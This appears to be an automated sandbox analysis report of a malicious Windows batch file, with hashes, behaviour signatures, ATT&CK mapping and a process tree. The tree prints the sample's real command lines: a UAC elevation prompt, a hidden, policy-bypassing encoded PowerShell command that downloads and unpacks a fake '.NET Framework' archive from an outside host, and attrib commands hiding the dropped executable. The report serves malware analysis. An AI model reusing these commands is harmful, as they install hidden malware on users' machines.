363156046460344c5dc499b0aa0e32078aabb3f1fe6229bc056cb7497948416d

General

Target

56107979d024223bd4ba443cf654ebfc32e19a3eaffd7a055fadb6ac1ce97866.bat
Size

22KB
MD5

244584512d6decb0d37cef150886e636
SHA1

fe50c7e039605957ab9bfd034f7861e6023d0093
SHA256

56107979d024223bd4ba443cf654ebfc32e19a3eaffd7a055fadb6ac1ce97866
SHA512

24613bbe96ab7befac49f8d4acd6b8a9d14bb0add1651412c0859d4031feabd2aa40e8e582a449af7acbb0eba6776de1b65f0ead759c7fcf089bf3d12eb46243
SSDEEP

384:b2VPeJS3xtpEG3cZrUKUE0gMGfa9720wvjeqzAzW6yeVf9jlP7JYK5zf8rh:bUWJS3xwQ8rUwMaaJ20wvjj0zLVRlzO5

Score

8^/10

evasion

Malware Config

Signatures

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
980	attrib.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2024	powershell.exe
2024	powershell.exe
2024	powershell.exe
1688	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeDebugPrivilege	1688	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 1256 wrote to memory of 2024	1256	cmd.exe	29
PID 1256 wrote to memory of 2024	1256	cmd.exe	29
PID 1256 wrote to memory of 2024	1256	cmd.exe	29
PID 2024 wrote to memory of 1272	2024	powershell.exe	30
PID 2024 wrote to memory of 1272	2024	powershell.exe	30
PID 2024 wrote to memory of 1272	2024	powershell.exe	30
PID 1272 wrote to memory of 1688	1272	cmd.exe	32
PID 1272 wrote to memory of 1688	1272	cmd.exe	32
PID 1272 wrote to memory of 1688	1272	cmd.exe	32
PID 1272 wrote to memory of 576	1272	cmd.exe	33
PID 1272 wrote to memory of 576	1272	cmd.exe	33
PID 1272 wrote to memory of 576	1272	cmd.exe	33
PID 1272 wrote to memory of 1340	1272	cmd.exe	34
PID 1272 wrote to memory of 1340	1272	cmd.exe	34
PID 1272 wrote to memory of 1340	1272	cmd.exe	34
PID 1272 wrote to memory of 980	1272	cmd.exe	35
PID 1272 wrote to memory of 980	1272	cmd.exe	35
PID 1272 wrote to memory of 980	1272	cmd.exe	35
PID 1272 wrote to memory of 1856	1272	cmd.exe	36
PID 1272 wrote to memory of 1856	1272	cmd.exe	36
PID 1272 wrote to memory of 1856	1272	cmd.exe	36

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
980	attrib.exe
1856	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\56107979d024223bd4ba443cf654ebfc32e19a3eaffd7a055fadb6ac1ce97866.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1256
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\56107979d024223bd4ba443cf654ebfc32e19a3eaffd7a055fadb6ac1ce97866.bat' -ArgumentList 'am_admin'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2024
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\56107979d024223bd4ba443cf654ebfc32e19a3eaffd7a055fadb6ac1ce97866.bat" am_admin
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1272
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nologo -noprofile -WindowStyle hidden -exec bypass -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAE4ARQBUAEYAcgBhAG0AZQBXAG8AcgBrAHYANAAvAHYANAAuADgALwByAGEAdwAvAG0AYQBpAG4ALwBOAEUAVABGAHIAYQBtAGUAdwBvAHIAawA0ADgALgB6AGkAcAAiACAALQBPAHUAdABGAGkAbABlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE4ARQBUAEYAcgBhAG0AZQB3AG8AcgBrADQAOAAuAHoAaQBwACIAIAA7ACAARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE4ARQBUAEYAcgBhAG0AZQB3AG8AcgBrADQAOAAuAHoAaQBwACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAiAAoA
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1688
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo F"
      4⤵
      PID:576
  - - C:\Windows\system32\xcopy.exe
      xcopy "C:\Users\Admin\AppData\Roaming\NETFramework48\install.exe" 56107979d024223bd4ba443cf654ebfc32e19a3eaffd7a055fadb6ac1ce97866.bat.exe /y
      4⤵
      PID:1340
  - - C:\Windows\system32\attrib.exe
      attrib +s +h 56107979d024223bd4ba443cf654ebfc32e19a3eaffd7a055fadb6ac1ce97866.bat.exe
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:980
  - - C:\Windows\system32\attrib.exe
      attrib -s -h 56107979d024223bd4ba443cf654ebfc32e19a3eaffd7a055fadb6ac1ce97866.bat.exe
      4⤵
      Views/modifies file attributes
      PID:1856

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

2

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

2

T1158

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
5ddbd8ceeb1909379a42b6af5c159153

SHA1
ceaebf19d5139635cf3c7401001554058dccbfc8

SHA256
1a941e1d53d90de053ae8b81b7eb9b80a629444465fdf1a0e5a42d740c491df3

SHA512
f4caec7bf680cb965f0be48b450b4614c6d9066027d7b0da1b1639eab0198a993a447e208c80841462e81f83938993cdb276c8389a3264d6fbc76a9115b9c3ce

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AD7IURNERK29TQZ8M1MK.temp

Filesize
7KB

MD5
5ddbd8ceeb1909379a42b6af5c159153

SHA1
ceaebf19d5139635cf3c7401001554058dccbfc8

SHA256
1a941e1d53d90de053ae8b81b7eb9b80a629444465fdf1a0e5a42d740c491df3

SHA512
f4caec7bf680cb965f0be48b450b4614c6d9066027d7b0da1b1639eab0198a993a447e208c80841462e81f83938993cdb276c8389a3264d6fbc76a9115b9c3ce

Download Submit
memory/1688-67-0x000000001B3A0000-0x000000001B682000-memory.dmp

Filesize
2.9MB

Download
memory/1688-68-0x0000000001E30000-0x0000000001E38000-memory.dmp

Filesize
32KB

Download
memory/1688-69-0x0000000002B14000-0x0000000002B17000-memory.dmp

Filesize
12KB

Download
memory/1688-70-0x0000000002B1B000-0x0000000002B52000-memory.dmp

Filesize
220KB

Download
memory/2024-58-0x000000001B1F0000-0x000000001B4D2000-memory.dmp

Filesize
2.9MB

Download
memory/2024-59-0x0000000002220000-0x0000000002228000-memory.dmp

Filesize
32KB

Download
memory/2024-60-0x0000000002314000-0x0000000002317000-memory.dmp

Filesize
12KB

Download
memory/2024-61-0x000000000231B000-0x0000000002352000-memory.dmp

Filesize
220KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads